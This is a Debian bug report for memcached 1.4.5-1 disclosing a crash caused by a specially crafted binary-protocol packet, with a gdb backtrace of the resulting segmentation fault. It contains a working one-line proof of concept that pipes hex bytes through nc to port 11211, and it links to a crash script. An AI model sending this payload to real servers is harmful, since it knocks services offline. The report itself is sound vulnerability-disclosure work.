Package: memcached Version: 1.4.5-1 Severity: important Tags: security memcached service crashes when sending specially crafted packet as reported in here https://code.google.com/p/memcached/issues/detail?id=i192 Mar 15, 2011. Upstream has not fixed this yet.
PoC: 1) echo -en '\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' | nc localhost 11211 2) http://insecurety.net/wordpress/wp-content/uploads/2013/04/killthebox.py_.txt Backtrace from squeeze libmemcached5 0.40-1 memcached 1.4.5-1 below: Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 0x7ffff69f0700 (LWP 16957)] 0x00007ffff76c7482 in _wordcopy_bwd_dest_aligned (dstp=140737352400864, srcp=6501120, len=2305843009213693940) at wordcopy.c:392 392 wordcopy.c: No such file or directory. in wordcopy.c (gdb) bt #0 0x00007ffff76c7482 in _wordcopy_bwd_dest_aligned (dstp=140737352400864, srcp=6501120, len=2305843009213693940) at wordcopy.c:392 #1 0x00007ffff76c568a in *__GI_memmove (dest=0x7ffff7e58053, src=<value optimized out>, len=18446744073709551581) at memmove.c:99 #2 0x000000000040a105 in ?? () #3 0x00007ffff7bcc344 in event_base_loop () from /usr/lib/libevent-1.4.so.2 #4 0x000000000040d7c4 in ?? () #5 0x00007ffff79af8ca in start_thread (arg=<value optimized out>) at pthread_create.c:300 #6 0x00007ffff7716b6d in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:112 #7 0x0000000000000000 in ?? () Please contact me in case you need help solving this issue. --- Henri Salo
signature.asc
Description: Digital signature
